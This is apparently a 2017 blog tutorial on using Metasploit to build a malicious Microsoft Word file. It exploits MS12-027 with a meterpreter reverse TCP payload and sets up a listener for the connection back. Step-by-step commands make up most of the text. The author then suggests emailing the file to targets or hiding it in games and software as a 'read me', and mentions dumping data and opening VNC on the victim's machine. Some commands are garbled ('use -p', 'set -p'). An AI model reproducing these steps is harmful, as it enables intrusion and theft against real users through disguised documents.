Tuesday, 14 February 2017

Metasploit Tutorial - 13 (hacking with MS word files)

Steps and instructions -

Hey whats up pen testers. In this tutorial you will learn how to make a malicious MS word file to hack windows machine.

Steps -

* Open a terminal and type in "msfconsole" to run metasploit

* We will use a perticuler exploit for this hack. So type in

"use exploit/windows/fileformat/ms12_027_mscomctl_bof"

If you want some options information you can type in "show options"

In this exploit we will create our malicious payload which will be a Microsoft Document file.

We need to set up - type in

"use -p windows/meterpreter_reverse_tcp"

"set LHOST (your IP)"

"set LPORT 4444"

Now we just need to say "exploit". This will create a file in /root/.msf7/local/msf.doc

We want to get the file on Desktop.

So type in "cp /root/.msf7/local/msf.doc /root/Desktop/"

You will get the file on Desktop.

One more set up is required. Set up our handler. Type in

"use exploit/multi/handler"

"set -p windows/meterpreter_reverse_tcp"

"set LHOST (your IP)"

"set LPORT 4444"

All we need is to type "exploit" now.

* Now comes the part where you can mail this file to your target.

When the target downloads or opens the file.... You will get a session in the meterpreter.

Now you can dump data or do some post exploitation.

I just got VNC live on the target machine by typing "run VNC"

This hack is very good because some social sites allow to send ms word files easily.

If the target is not available over the Internet we can use this file inside some other data files like Games or softwares and name the file as read me or something like that.

Thank you guys for reading the tutorial.

I have made a set of complete tutorial from the beginners level.

You may wan to see these -

1 comment: